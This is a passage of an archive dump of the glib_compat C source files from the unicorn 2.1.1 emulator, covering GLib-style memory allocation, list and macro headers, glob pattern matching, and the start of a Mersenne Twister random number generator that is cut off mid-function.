Team. See the ChangeLog * files for a list of changes. These files are distributed with * GLib at ftp://ftp.gtk.org/pub/gtk/. 
*/ #ifndef __G_LIST_H__ #define __G_LIST_H__ #include "gmem.h" typedef struct _GList GList; struct _GList { gpointer data; GList *next; GList *prev; }; GList* g_list_insert_before (GList *list, GList *sibling, gpointer data); GList* g_list_delete_link (GList *list, GList *link_); #endif /* __G_LIST_H__ */ ����������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/glib_compat/gmacros.h�����������������������������������������������������������������0000664�0000000�0000000�00000003705�14675241067�0017275�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������/* GLIB - Library of useful routines for C programming * Copyright (C) 1995-1997 Peter Mattis, Spencer Kimball and Josh MacDonald * * This library is free software; you can redistribute it and/or * modify it under the terms of the GNU Lesser General Public * License as published by the Free Software Foundation; either * version 2.1 of the License, or (at your option) any later version. * * This library is distributed in the hope that it will be useful, * but WITHOUT ANY WARRANTY; without even the implied warranty of * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU * Lesser General Public License for more details. * * You should have received a copy of the GNU Lesser General Public * License along with this library; if not, see <http://www.gnu.org/licenses/>. */ /* * Modified by the GLib Team and others 1997-2000. See the AUTHORS * file for a list of people on the GLib Team. See the ChangeLog * files for a list of changes. These files are distributed with * GLib at ftp://ftp.gtk.org/pub/gtk/. */ /* This file must not include any other glib header file and must thus * not refer to variables from glibconfig.h */ #ifndef __G_MACROS_H__ #define __G_MACROS_H__ /* We include stddef.h to get the system's definition of NULL */ #include <stddef.h> /* Here we provide G_GNUC_EXTENSION as an alias for __extension__, * where this is valid. This allows for warningless compilation of * "long long" types even in the presence of '-ansi -pedantic'. 
*/ #if __GNUC__ > 2 || (__GNUC__ == 2 && __GNUC_MINOR__ >= 8) #define G_GNUC_EXTENSION __extension__ #else #define G_GNUC_EXTENSION #endif #if !(defined (G_STMT_START) && defined (G_STMT_END)) #define G_STMT_START do #if defined (_MSC_VER) && (_MSC_VER >= 1500) #define G_STMT_END \ __pragma(warning(push)) \ __pragma(warning(disable:4127)) \ while(0) \ __pragma(warning(pop)) #else #define G_STMT_END while (0) #endif #endif #endif /* __G_MACROS_H__ */ �����������������������������������������������������������unicorn-2.1.1/glib_compat/gmem.c��������������������������������������������������������������������0000664�0000000�0000000�00000015223�14675241067�0016560�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������/* GLIB - Library of useful routines for C programming * Copyright (C) 1995-1997 Peter Mattis, Spencer Kimball and Josh MacDonald * * This library is free software; you can redistribute it and/or * modify it under the terms of the GNU Lesser General Public * License as published by the Free Software Foundation; either * version 2.1 of the License, or (at your option) any later version. * * This library is distributed in the hope that it will be useful, * but WITHOUT ANY WARRANTY; without even the implied warranty of * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU * Lesser General Public License for more details. * * You should have received a copy of the GNU Lesser General Public * License along with this library; if not, see <http://www.gnu.org/licenses/>. */ /* * Modified by the GLib Team and others 1997-2000. See the AUTHORS * file for a list of people on the GLib Team. See the ChangeLog * files for a list of changes. These files are distributed with * GLib at ftp://ftp.gtk.org/pub/gtk/. */ /* * MT safe */ #include "gtypes.h" #include "gmem.h" #include <stdlib.h> #include "gslice.h" #define SIZE_OVERFLOWS(a,b) (((b) > 0 && (a) > G_MAXSIZE / (b))) /** * g_try_malloc: * @n_bytes: number of bytes to allocate. * * Attempts to allocate @n_bytes, and returns %NULL on failure. * Contrast with g_malloc(), which aborts the program on failure. * * Returns: the allocated memory, or %NULL. */ gpointer g_try_malloc (gsize n_bytes) { gpointer mem; if (n_bytes) mem = malloc (n_bytes); else mem = NULL; return mem; } /** * g_try_malloc_n: * @n_blocks: the number of blocks to allocate * @n_block_bytes: the size of each block in bytes * * This function is similar to g_try_malloc(), allocating (@n_blocks * @n_block_bytes) bytes, * but care is taken to detect possible overflow during multiplication. * * Since: 2.24 * Returns: the allocated memory, or %NULL. */ gpointer g_try_malloc_n (gsize n_blocks, gsize n_block_bytes) { if (SIZE_OVERFLOWS (n_blocks, n_block_bytes)) return NULL; return g_try_malloc (n_blocks * n_block_bytes); } /** * g_malloc: * @n_bytes: the number of bytes to allocate * * Allocates @n_bytes bytes of memory. * If @n_bytes is 0 it returns %NULL. 
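 * A short sketch (illustrative only):
 * |[
 * gchar *buf = g_malloc (16);
 * g_free (buf);
 * buf = g_malloc (0); // zero-size requests yield NULL
 * ]|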
 *
 * Returns: a pointer to the allocated memory
 */
gpointer g_malloc (gsize n_bytes)
{
    if (n_bytes) {
        gpointer mem;

        mem = malloc (n_bytes);
        if (mem)
            return mem;
        //g_error ("%s: failed to allocate %"G_GSIZE_FORMAT" bytes",
        //         G_STRLOC, n_bytes);
    }
    return NULL;
}

/**
 * g_malloc_n:
 * @n_blocks: the number of blocks to allocate
 * @n_block_bytes: the size of each block in bytes
 *
 * This function is similar to g_malloc(), allocating (@n_blocks * @n_block_bytes) bytes,
 * but care is taken to detect possible overflow during multiplication.
 *
 * Since: 2.24
 * Returns: a pointer to the allocated memory
 */
gpointer g_malloc_n (gsize n_blocks, gsize n_block_bytes)
{
    if (SIZE_OVERFLOWS (n_blocks, n_block_bytes)) {
        /* The multiplication would wrap; refuse the request instead of
         * allocating a too-small block. (GLib proper aborts here.) */
        //g_error ("%s: overflow allocating %"G_GSIZE_FORMAT"*%"G_GSIZE_FORMAT" bytes",
        //         G_STRLOC, n_blocks, n_block_bytes);
        return NULL;
    }
    return g_malloc (n_blocks * n_block_bytes);
}

/**
 * g_malloc0:
 * @n_bytes: the number of bytes to allocate
 *
 * Allocates @n_bytes bytes of memory, initialized to 0's.
 * If @n_bytes is 0 it returns %NULL.
 *
 * Returns: a pointer to the allocated memory
 */
gpointer g_malloc0 (gsize n_bytes)
{
    if (n_bytes) {
        gpointer mem;

        mem = calloc (1, n_bytes);
        if (mem)
            return mem;
        //g_error ("%s: failed to allocate %"G_GSIZE_FORMAT" bytes",
        //         G_STRLOC, n_bytes);
    }
    return NULL;
}

/**
 * g_malloc0_n:
 * @n_blocks: the number of blocks to allocate
 * @n_block_bytes: the size of each block in bytes
 *
 * This function is similar to g_malloc0(), allocating (@n_blocks * @n_block_bytes) bytes,
 * but care is taken to detect possible overflow during multiplication.
 *
 * Since: 2.24
 * Returns: a pointer to the allocated memory
 */
gpointer g_malloc0_n (gsize n_blocks, gsize n_block_bytes)
{
    if (SIZE_OVERFLOWS (n_blocks, n_block_bytes)) {
        /* See g_malloc_n(): reject wrapped sizes. */
        //g_error ("%s: overflow allocating %"G_GSIZE_FORMAT"*%"G_GSIZE_FORMAT" bytes",
        //         G_STRLOC, n_blocks, n_block_bytes);
        return NULL;
    }
    return g_malloc0 (n_blocks * n_block_bytes);
}

/**
 * g_try_malloc0:
 * @n_bytes: number of bytes to allocate
 *
 * Attempts to allocate @n_bytes, initialized to 0's, and returns %NULL on
 * failure. Contrast with g_malloc0(), which aborts the program on failure.
 *
 * Since: 2.8
 * Returns: the allocated memory, or %NULL
 */
gpointer g_try_malloc0 (gsize n_bytes)
{
    gpointer mem;

    if (n_bytes)
        mem = calloc (1, n_bytes);
    else
        mem = NULL;

    return mem;
}

/**
 * g_realloc:
 * @mem: (nullable): the memory to reallocate
 * @n_bytes: new size of the memory in bytes
 *
 * Reallocates the memory pointed to by @mem, so that it now has space for
 * @n_bytes bytes of memory. It returns the new address of the memory, which may
 * have been moved. @mem may be %NULL, in which case it's considered to
 * have zero-length. @n_bytes may be 0, in which case %NULL will be returned
 * and @mem will be freed unless it is %NULL.
 *
 * Returns: the new address of the allocated memory
 */
gpointer g_realloc (gpointer mem, gsize n_bytes)
{
    gpointer newmem;

    if (n_bytes) {
        newmem = realloc (mem, n_bytes);
        if (newmem)
            return newmem;
        //g_error("%s: failed to allocate %"G_GSIZE_FORMAT" bytes", G_STRLOC, n_bytes);
    }
    free (mem);
    return NULL;
}

/**
 * g_realloc_n:
 * @mem: (nullable): the memory to reallocate
 * @n_blocks: the number of blocks to allocate
 * @n_block_bytes: the size of each block in bytes
 *
 * This function is similar to g_realloc(), allocating (@n_blocks * @n_block_bytes) bytes,
 * but care is taken to detect possible overflow during multiplication.
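 * For example (illustrative sketch only), a product that would not fit in a
 * #gsize is refused instead of silently wrapping:
 * |[
 * gpointer p = g_realloc_n (NULL, G_MAXSIZE / 2, 16); // overflow: p == NULL
 * ]|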
 *
 * Since: 2.24
 * Returns: the new address of the allocated memory
 */
gpointer g_realloc_n (gpointer mem, gsize n_blocks, gsize n_block_bytes)
{
    if (SIZE_OVERFLOWS (n_blocks, n_block_bytes)) {
        /* See g_malloc_n(): reject wrapped sizes rather than shrinking
         * the block behind the caller's back. */
        //g_error ("%s: overflow allocating %"G_GSIZE_FORMAT"*%"G_GSIZE_FORMAT" bytes",
        //         G_STRLOC, n_blocks, n_block_bytes);
        return NULL;
    }
    return g_realloc (mem, n_blocks * n_block_bytes);
}

/**
 * g_free:
 * @mem: (nullable): the memory to free
 *
 * Frees the memory pointed to by @mem.
 *
 * If @mem is %NULL it simply returns, so there is no need to check @mem
 * against %NULL before calling this function.
 */
void g_free (gpointer mem)
{
    free (mem);
}
unicorn-2.1.1/glib_compat/gmem.h 0000664 0000000 0000000 00000010530 14675241067 0016561 0 ustar 00root root 0000000 0000000
/* GLIB - Library of useful routines for C programming
 * Copyright (C) 1995-1997 Peter Mattis, Spencer Kimball and Josh MacDonald
 *
 * This library is free software; you can redistribute it and/or
 * modify it under the terms of the GNU Lesser General Public
 * License as published by the Free Software Foundation; either
 * version 2.1 of the License, or (at your option) any later version.
 *
 * This library is distributed in the hope that it will be useful,
 * but WITHOUT ANY WARRANTY; without even the implied warranty of
 * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the GNU
 * Lesser General Public License for more details.
 *
 * You should have received a copy of the GNU Lesser General Public
 * License along with this library; if not, see <http://www.gnu.org/licenses/>.
 */

/*
 * Modified by the GLib Team and others 1997-2000.  See the AUTHORS
 * file for a list of people on the GLib Team.  See the ChangeLog
 * files for a list of changes.  These files are distributed with
 * GLib at ftp://ftp.gtk.org/pub/gtk/.
 */

#ifndef __G_MEM_H__
#define __G_MEM_H__

#include <limits.h>
#include "gmacros.h"

#define G_MAXSIZE ULONG_MAX

/* Optimise: avoid the call to the (slower) _n function if we can
 * determine at compile-time that no overflow happens.
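 * For instance (illustrative only), with the GCC branch below a call like
 * |[
 * GHashNode *nodes = g_new0 (GHashNode, 8);
 * ]|
 * compiles straight down to g_malloc0 (8 * sizeof (GHashNode)), because the
 * element count is a compile-time constant that provably cannot overflow.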
 */
#if defined (__GNUC__) && (__GNUC__ >= 2) && defined (__OPTIMIZE__)

#  define _G_NEW(struct_type, n_structs, func) \
        (struct_type *) (G_GNUC_EXTENSION ({ \
            gsize __n = (gsize) (n_structs); \
            gsize __s = sizeof (struct_type); \
            gpointer __p; \
            if (__s == 1) \
                __p = g_##func (__n); \
            else if (__builtin_constant_p (__n) && \
                     (__s == 0 || __n <= G_MAXSIZE / __s)) \
                __p = g_##func (__n * __s); \
            else \
                __p = g_##func##_n (__n, __s); \
            __p; \
        }))
#  define _G_RENEW(struct_type, mem, n_structs, func) \
        (struct_type *) (G_GNUC_EXTENSION ({ \
            gsize __n = (gsize) (n_structs); \
            gsize __s = sizeof (struct_type); \
            gpointer __p = (gpointer) (mem); \
            if (__s == 1) \
                __p = g_##func (__p, __n); \
            else if (__builtin_constant_p (__n) && \
                     (__s == 0 || __n <= G_MAXSIZE / __s)) \
                __p = g_##func (__p, __n * __s); \
            else \
                __p = g_##func##_n (__p, __n, __s); \
            __p; \
        }))

#else

/* Unoptimised version: always call the _n() function. */

#define _G_NEW(struct_type, n_structs, func) \
        ((struct_type *) g_##func##_n ((n_structs), sizeof (struct_type)))
#define _G_RENEW(struct_type, mem, n_structs, func) \
        ((struct_type *) g_##func##_n (mem, (n_structs), sizeof (struct_type)))

#endif

gpointer g_try_malloc (gsize n_bytes);
gpointer g_try_malloc0 (gsize n_bytes);
gpointer g_try_malloc_n (gsize n_blocks, gsize n_block_bytes);
gpointer g_malloc0_n (gsize n_blocks, gsize n_block_bytes);
gpointer g_realloc_n (gpointer mem, gsize n_blocks, gsize n_block_bytes);
gpointer g_malloc_n (gsize n_blocks, gsize n_block_bytes);
gpointer g_malloc0 (gsize n_bytes);
gpointer g_malloc (gsize n_bytes);
void g_free (gpointer mem);

/**
 * g_try_new:
 * @struct_type: the type of the elements to allocate
 * @n_structs: the number of elements to allocate
 *
 * Attempts to allocate @n_structs elements of type @struct_type, and returns
 * %NULL on failure. Contrast with g_new(), which aborts the program on failure.
 * The returned pointer is cast to a pointer to the given type.
 * The function returns %NULL when @n_structs is 0 or if an overflow occurs.
 *
 * Since: 2.8
 * Returns: a pointer to the allocated memory, cast to a pointer to @struct_type
 */
#define g_try_new(struct_type, n_structs) _G_NEW (struct_type, n_structs, try_malloc)
#define g_new0(struct_type, n_structs) _G_NEW (struct_type, n_structs, malloc0)
#define g_new(struct_type, n_structs) _G_NEW (struct_type, n_structs, malloc)
#define g_renew(struct_type, mem, n_structs) _G_RENEW (struct_type, mem, n_structs, realloc)

#endif /* __G_MEM_H__ */
unicorn-2.1.1/glib_compat/gmessages.h 0000664 0000000 0000000 00000002640 14675241067 0017615 0 ustar 00root root 0000000 0000000
/* GLIB - Library of useful routines for C programming
 * Copyright (C) 1995-1997 Peter Mattis, Spencer Kimball and Josh MacDonald
 *
 * This library is free software; you can redistribute it and/or
 * modify it under the terms of the GNU Lesser General Public
 * License as published by the Free Software Foundation; either
 * version 2.1 of the License, or (at your option) any later version.
* * This library is distributed in the hope that it will be useful, * but WITHOUT ANY WARRANTY; without even the implied warranty of * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU * Lesser General Public License for more details. * * You should have received a copy of the GNU Lesser General Public * License along with this library; if not, see <http://www.gnu.org/licenses/>. */ /* * Modified by the GLib Team and others 1997-2000. See the AUTHORS * file for a list of people on the GLib Team. See the ChangeLog * files for a list of changes. These files are distributed with * GLib at ftp://ftp.gtk.org/pub/gtk/. */ #ifndef __G_MESSAGES_H__ #define __G_MESSAGES_H__ #include "gmacros.h" #define g_return_val_if_fail(expr,val) G_STMT_START{ (void)0; }G_STMT_END #define g_return_if_fail(expr) G_STMT_START{ (void)0; }G_STMT_END #define g_return_if_reached() G_STMT_START{ return; }G_STMT_END #define g_return_val_if_reached(val) G_STMT_START{ return (val); }G_STMT_END #endif /* __G_MESSAGES_H__ */ ������������������������������������������������������������������������������������������������unicorn-2.1.1/glib_compat/gnode.h�������������������������������������������������������������������0000664�0000000�0000000�00000002360�14675241067�0016732�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������/* GLIB - Library of useful routines for C programming * Copyright (C) 1995-1997 Peter Mattis, Spencer Kimball and Josh MacDonald * * This library is free software; you can redistribute it and/or * modify it under the terms of the GNU Lesser General Public * License as published by the Free Software Foundation; either * version 2.1 of the License, or (at your option) any later version. * * This library is distributed in the hope that it will be useful, * but WITHOUT ANY WARRANTY; without even the implied warranty of * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU * Lesser General Public License for more details. * * You should have received a copy of the GNU Lesser General Public * License along with this library; if not, see <http://www.gnu.org/licenses/>. */ /* * Modified by the GLib Team and others 1997-2000. See the AUTHORS * file for a list of people on the GLib Team. See the ChangeLog * files for a list of changes. These files are distributed with * GLib at ftp://ftp.gtk.org/pub/gtk/. 
*/ #ifndef __G_NODE_H__ #define __G_NODE_H__ #include "gmem.h" /* Tree traverse orders */ typedef enum { G_IN_ORDER, G_PRE_ORDER, G_POST_ORDER, G_LEVEL_ORDER } GTraverseType; #endif /* __G_NODE_H__ */ ��������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/glib_compat/gpattern.c����������������������������������������������������������������0000664�0000000�0000000�00000030754�14675241067�0017465�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������/* GLIB - Library of useful routines for C programming * Copyright (C) 1995-1997, 1999 Peter Mattis, Red Hat, Inc. * * This library is free software; you can redistribute it and/or * modify it under the terms of the GNU Lesser General Public * License as published by the Free Software Foundation; either * version 2.1 of the License, or (at your option) any later version. * * This library is distributed in the hope that it will be useful, * but WITHOUT ANY WARRANTY; without even the implied warranty of * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU * Lesser General Public License for more details. * * You should have received a copy of the GNU Lesser General Public * License along with this library; if not, see <http://www.gnu.org/licenses/>. */ #include <string.h> #include "gpattern.h" #include "gmacros.h" #include "gmessages.h" #include "gmem.h" /** * SECTION:patterns * @title: Glob-style pattern matching * @short_description: matches strings against patterns containing '*' * (wildcard) and '?' (joker) * * The g_pattern_match* functions match a string * against a pattern containing '*' and '?' wildcards with similar * semantics as the standard glob() function: '*' matches an arbitrary, * possibly empty, string, '?' matches an arbitrary character. * * Note that in contrast to glob(), the '/' character can be matched by * the wildcards, there are no '[...]' character ranges and '*' and '?' * can not be escaped to include them literally in a pattern. * * When multiple strings must be matched against the same pattern, it * is better to compile the pattern to a #GPatternSpec using * g_pattern_spec_new() and use g_pattern_match_string() instead of * g_pattern_match_simple(). This avoids the overhead of repeated * pattern compilation. **/ /** * GPatternSpec: * * A GPatternSpec struct is the 'compiled' form of a pattern. This * structure is opaque and its fields cannot be accessed directly. 
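 *
 * A typical use of this API (illustrative sketch):
 * |[
 * GPatternSpec *spec = g_pattern_spec_new ("*.iso");
 * gboolean hit = g_pattern_match_string (spec, "ubuntu.iso"); // TRUE
 * g_pattern_spec_free (spec);
 * ]|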
*/ /* keep enum and structure of gpattern.c and patterntest.c in sync */ typedef enum { G_MATCH_ALL, /* "*A?A*" */ G_MATCH_ALL_TAIL, /* "*A?AA" */ G_MATCH_HEAD, /* "AAAA*" */ G_MATCH_TAIL, /* "*AAAA" */ G_MATCH_EXACT, /* "AAAAA" */ G_MATCH_LAST } GMatchType; struct _GPatternSpec { GMatchType match_type; guint pattern_length; guint min_length; guint max_length; gchar *pattern; }; /* --- functions --- */ static inline gboolean g_pattern_ph_match (const gchar *match_pattern, const gchar *match_string, gboolean *wildcard_reached_p) { const gchar *pattern, *string; gchar ch; pattern = match_pattern; string = match_string; ch = *pattern; pattern++; while (ch) { switch (ch) { case '?': if (!*string) return FALSE; string = string + 1; break; case '*': *wildcard_reached_p = TRUE; do { ch = *pattern; pattern++; if (ch == '?') { if (!*string) return FALSE; string = string + 1; } } while (ch == '*' || ch == '?'); if (!ch) return TRUE; do { gboolean next_wildcard_reached = FALSE; while (ch != *string) { if (!*string) return FALSE; string = string + 1; } string++; if (g_pattern_ph_match (pattern, string, &next_wildcard_reached)) return TRUE; if (next_wildcard_reached) /* the forthcoming pattern substring up to the next wildcard has * been matched, but a mismatch occurred for the rest of the * pattern, following the next wildcard. * there's no need to advance the current match position any * further if the rest pattern will not match. */ return FALSE; } while (*string); break; default: if (ch == *string) string++; else return FALSE; break; } ch = *pattern; pattern++; } return *string == 0; } static gchar *string_reverse(const gchar *string, gint string_length) { gchar *new_string; gint i, j; if (string == NULL || string_length <= 0) { return NULL; } new_string = g_new(gchar, string_length + 1); if (new_string) { for (i = 0; i < string_length; i++) { j = string_length - i - 1; new_string[j] = string[i]; } new_string[string_length] = 0; } return new_string; } /** * g_pattern_match: * @pspec: a #GPatternSpec * @string_length: the length of @string (in bytes, i.e. strlen(), * not g_utf8_strlen()) * @string: the UTF-8 encoded string to match * @string_reversed: (nullable): the reverse of @string or %NULL * * Matches a string against a compiled pattern. Passing the correct * length of the string given is mandatory. The reversed string can be * omitted by passing %NULL, this is more efficient if the reversed * version of the string to be matched is not at hand, as * g_pattern_match() will only construct it if the compiled pattern * requires reverse matches. * * Note that, if the user code will (possibly) match a string against a * multitude of patterns containing wildcards, chances are high that * some patterns will require a reversed string. In this case, it's * more efficient to provide the reversed string to avoid multiple * constructions thereof in the various calls to g_pattern_match(). * * Note also that the reverse of a UTF-8 encoded string can in general * not be obtained by g_strreverse(). This works only if the string * does not contain any multibyte characters. GLib offers the * g_utf8_strreverse() function to reverse UTF-8 encoded strings. 
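 * If the reversed form is not readily available, passing %NULL is always
 * correct (sketch only; @pspec and @str are assumed):
 * |[
 * gboolean hit = g_pattern_match (pspec, strlen (str), str, NULL);
 * ]|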
* * Returns: %TRUE if @string matches @pspec **/ gboolean g_pattern_match (GPatternSpec *pspec, guint string_length, const gchar *string, const gchar *string_reversed) { g_return_val_if_fail (pspec != NULL, FALSE); g_return_val_if_fail (string != NULL, FALSE); if (string_length < pspec->min_length || string_length > pspec->max_length) return FALSE; switch (pspec->match_type) { gboolean dummy; case G_MATCH_ALL: return g_pattern_ph_match (pspec->pattern, string, &dummy); case G_MATCH_ALL_TAIL: if (string_reversed) return g_pattern_ph_match (pspec->pattern, string_reversed, &dummy); else { gboolean result; gchar *tmp; tmp = string_reverse (string, string_length); result = g_pattern_ph_match (pspec->pattern, tmp, &dummy); g_free (tmp); return result; } case G_MATCH_HEAD: if (pspec->pattern_length == string_length) return strcmp (pspec->pattern, string) == 0; else if (pspec->pattern_length) return strncmp (pspec->pattern, string, pspec->pattern_length) == 0; else return TRUE; case G_MATCH_TAIL: if (pspec->pattern_length) return strcmp (pspec->pattern, string + (string_length - pspec->pattern_length)) == 0; else return TRUE; case G_MATCH_EXACT: if (pspec->pattern_length != string_length) return FALSE; else return strcmp (pspec->pattern, string) == 0; default: g_return_val_if_fail (pspec->match_type < G_MATCH_LAST, FALSE); return FALSE; } } /** * g_pattern_spec_new: * @pattern: a zero-terminated UTF-8 encoded string * * Compiles a pattern to a #GPatternSpec. * * Returns: a newly-allocated #GPatternSpec **/ GPatternSpec* g_pattern_spec_new (const gchar *pattern) { GPatternSpec *pspec; gboolean seen_joker = FALSE, seen_wildcard = FALSE, more_wildcards = FALSE; gint hw_pos = -1, tw_pos = -1, hj_pos = -1, tj_pos = -1; gboolean follows_wildcard = FALSE; guint pending_jokers = 0; const gchar *s; gchar *d; guint i; g_return_val_if_fail (pattern != NULL, NULL); /* canonicalize pattern and collect necessary stats */ pspec = g_new (GPatternSpec, 1); pspec->pattern_length = strlen (pattern); pspec->min_length = 0; pspec->max_length = 0; pspec->pattern = g_new (gchar, pspec->pattern_length + 1); d = pspec->pattern; for (i = 0, s = pattern; *s != 0; s++) { switch (*s) { case '*': if (follows_wildcard) /* compress multiple wildcards */ { pspec->pattern_length--; continue; } follows_wildcard = TRUE; if (hw_pos < 0) hw_pos = i; tw_pos = i; break; case '?': pending_jokers++; pspec->min_length++; pspec->max_length += 4; /* maximum UTF-8 character length */ continue; default: for (; pending_jokers; pending_jokers--, i++) { *d++ = '?'; if (hj_pos < 0) hj_pos = i; tj_pos = i; } follows_wildcard = FALSE; pspec->min_length++; pspec->max_length++; break; } *d++ = *s; i++; } for (; pending_jokers; pending_jokers--) { *d++ = '?'; if (hj_pos < 0) hj_pos = i; tj_pos = i; } *d++ = 0; seen_joker = hj_pos >= 0; seen_wildcard = hw_pos >= 0; more_wildcards = seen_wildcard && hw_pos != tw_pos; if (seen_wildcard) pspec->max_length = UINT_MAX; /* special case sole head/tail wildcard or exact matches */ if (!seen_joker && !more_wildcards) { if (pspec->pattern[0] == '*') { pspec->match_type = G_MATCH_TAIL; memmove (pspec->pattern, pspec->pattern + 1, --pspec->pattern_length); pspec->pattern[pspec->pattern_length] = 0; return pspec; } if (pspec->pattern_length > 0 && pspec->pattern[pspec->pattern_length - 1] == '*') { pspec->match_type = G_MATCH_HEAD; pspec->pattern[--pspec->pattern_length] = 0; return pspec; } if (!seen_wildcard) { pspec->match_type = G_MATCH_EXACT; return pspec; } } /* now just need to distinguish between head or 
tail match start */ tw_pos = pspec->pattern_length - 1 - tw_pos; /* last pos to tail distance */ tj_pos = pspec->pattern_length - 1 - tj_pos; /* last pos to tail distance */ if (seen_wildcard) pspec->match_type = tw_pos > hw_pos ? G_MATCH_ALL_TAIL : G_MATCH_ALL; else /* seen_joker */ pspec->match_type = tj_pos > hj_pos ? G_MATCH_ALL_TAIL : G_MATCH_ALL; if (pspec->match_type == G_MATCH_ALL_TAIL) { gchar *tmp = pspec->pattern; pspec->pattern = string_reverse (pspec->pattern, pspec->pattern_length); g_free (tmp); } return pspec; } /** * g_pattern_spec_free: * @pspec: a #GPatternSpec * * Frees the memory allocated for the #GPatternSpec. **/ void g_pattern_spec_free (GPatternSpec *pspec) { g_return_if_fail (pspec != NULL); g_free (pspec->pattern); g_free (pspec); } /** * g_pattern_match_string: * @pspec: a #GPatternSpec * @string: the UTF-8 encoded string to match * * Matches a string against a compiled pattern. If the string is to be * matched against more than one pattern, consider using * g_pattern_match() instead while supplying the reversed string. * * Returns: %TRUE if @string matches @pspec **/ gboolean g_pattern_match_string (GPatternSpec *pspec, const gchar *string) { g_return_val_if_fail (pspec != NULL, FALSE); g_return_val_if_fail (string != NULL, FALSE); return g_pattern_match (pspec, strlen (string), string, NULL); } ��������������������unicorn-2.1.1/glib_compat/gpattern.h����������������������������������������������������������������0000664�0000000�0000000�00000002456�14675241067�0017470�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������/* GLIB - Library of useful routines for C programming * Copyright (C) 1995-1997, 1999 Peter Mattis, Red Hat, Inc. * * This library is free software; you can redistribute it and/or * modify it under the terms of the GNU Lesser General Public * License as published by the Free Software Foundation; either * version 2.1 of the License, or (at your option) any later version. * * This library is distributed in the hope that it will be useful, * but WITHOUT ANY WARRANTY; without even the implied warranty of * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU * Lesser General Public License for more details. * * You should have received a copy of the GNU Lesser General Public * License along with this library; if not, see <http://www.gnu.org/licenses/>. 
*/ #ifndef __G_PATTERN_H__ #define __G_PATTERN_H__ #include "gtypes.h" typedef struct _GPatternSpec GPatternSpec; GPatternSpec* g_pattern_spec_new (const gchar *pattern); void g_pattern_spec_free (GPatternSpec *pspec); gboolean g_pattern_match (GPatternSpec *pspec, guint string_length, const gchar *string, const gchar *string_reversed); gboolean g_pattern_match_string (GPatternSpec *pspec, const gchar *string); #endif /* __G_PATTERN_H__ */ ������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/glib_compat/grand.c�������������������������������������������������������������������0000664�0000000�0000000�00000024631�14675241067�0016731�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������/* GLIB - Library of useful routines for C programming * Copyright (C) 1995-1997 Peter Mattis, Spencer Kimball and Josh MacDonald * * This library is free software; you can redistribute it and/or * modify it under the terms of the GNU Lesser General Public * License as published by the Free Software Foundation; either * version 2.1 of the License, or (at your option) any later version. * * This library is distributed in the hope that it will be useful, * but WITHOUT ANY WARRANTY; without even the implied warranty of * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU * Lesser General Public License for more details. * * You should have received a copy of the GNU Lesser General Public * License along with this library; if not, see <http://www.gnu.org/licenses/>. */ /* Originally developed and coded by Makoto Matsumoto and Takuji * Nishimura. Please mail <matumoto@math.keio.ac.jp>, if you're using * code from this file in your own programs or libraries. * Further information on the Mersenne Twister can be found at * http://www.math.sci.hiroshima-u.ac.jp/~m-mat/MT/emt.html * This code was adapted to glib by Sebastian Wilhelmi. */ /* * Modified by the GLib Team and others 1997-2000. See the AUTHORS * file for a list of people on the GLib Team. See the ChangeLog * files for a list of changes. These files are distributed with * GLib at ftp://ftp.gtk.org/pub/gtk/. 
*/ /* * MT safe */ #define _CRT_RAND_S #include <math.h> #include <errno.h> #include <stdio.h> #include <string.h> #include <sys/types.h> #ifndef _MSC_VER #include <unistd.h> #include <sys/time.h> #else #include <windows.h> #endif #include "grand.h" #include "gmem.h" #include "gmessages.h" #define G_USEC_PER_SEC 1000000 #if defined(__MINGW64_VERSION_MAJOR) || defined(_WIN32) errno_t rand_s(unsigned int* randomValue); #endif #define G_GINT64_CONSTANT(val) (val##L) /* Period parameters */ #define N 624 #define M 397 #define MATRIX_A 0x9908b0df /* constant vector a */ #define UPPER_MASK 0x80000000 /* most significant w-r bits */ #define LOWER_MASK 0x7fffffff /* least significant r bits */ /* Tempering parameters */ #define TEMPERING_MASK_B 0x9d2c5680 #define TEMPERING_MASK_C 0xefc60000 #define TEMPERING_SHIFT_U(y) (y >> 11) #define TEMPERING_SHIFT_S(y) (y << 7) #define TEMPERING_SHIFT_T(y) (y << 15) #define TEMPERING_SHIFT_L(y) (y >> 18) struct _GRand { guint32 mt[N]; /* the array for the state vector */ guint mti; }; static guint get_random_version (void) { static gsize initialized = FALSE; static guint random_version; if (!initialized) { // g_warning ("Unknown G_RANDOM_VERSION \"%s\". Using version 2.2.", version_string); random_version = 22; initialized = TRUE; } return random_version; } /** * g_rand_set_seed: * @rand_: a #GRand * @seed: a value to reinitialize the random number generator * * Sets the seed for the random number generator #GRand to @seed. */ void g_rand_set_seed (GRand *rand, guint32 seed) { g_return_if_fail (rand != NULL); switch (get_random_version ()) { case 20: /* setting initial seeds to mt[N] using */ /* the generator Line 25 of Table 1 in */ /* [KNUTH 1981, The Art of Computer Programming */ /* Vol. 2 (2nd Ed.), pp102] */ if (seed == 0) /* This would make the PRNG produce only zeros */ seed = 0x6b842128; /* Just set it to another number */ rand->mt[0]= seed; for 